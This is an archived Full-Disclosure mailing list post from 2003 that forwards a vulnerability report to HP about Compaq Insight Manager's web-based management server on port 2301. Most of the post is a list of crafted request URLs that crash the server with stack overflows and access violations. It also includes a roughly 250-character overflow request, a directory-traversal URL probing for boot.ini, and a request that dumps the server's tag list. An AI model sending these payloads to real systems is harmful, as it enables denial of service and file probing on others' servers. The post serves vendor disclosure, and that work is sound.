Compaq/HP WBEM stuff (fwd)

[bashis <mcw () ns wcd se>]

Compaq Insight Manager - Web-Based Management

Exploitable w3 server?
I don't know and i don't care...

Regards, bashis

> Subject: Compaq/HP WBEM stuff
> To: security-alert () hp com
> Date: Sun, 9 Mar 2003 22:56:04 +0100 (CET)
>
> Compaq Web-Based Management stuff.
>
> All versions of WBEM seems to be affected..
> (These 'tags' works also with 'secure' HTTPS tcp/2381.)
>
> http://<IP>:2301/<!.StringRedirecturl>
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
>
> http://<IP>:2301/<!>       
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
>
> http://<IP>:2301/survey/<!>
> Stack overflow (0xc00000fd), Address: 0x10039869
>
> http://<IP>:2301/<!.StringHttpRequest=Url>
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
>
> http://<IP>:2301/survey/<!.StringHttpRequest=Url>
> Stack overflow (0xc00000fd), Address: 0x10039869
>
> http://<IP>:2301/<!.StringIsapiECB=lpszPathInfo>
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
>
> http://<IP>:2301/<!.ObjectIsapiECB>
> Stack overflow (0xc00000fd), Address: 0x77f0c3dc
>
> GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0
> Access violation (0xc0000005), Address: 0x100368a5
>
> Check file existens. (with a nice 'input box';)
> http://<IP>:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini
>
> ..... plus many more tags.
>
> Get a whole 'TAG' list with:    
> http://<IP>:2301/<!.TableDisplayTags>
>
> Regards, bashis

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html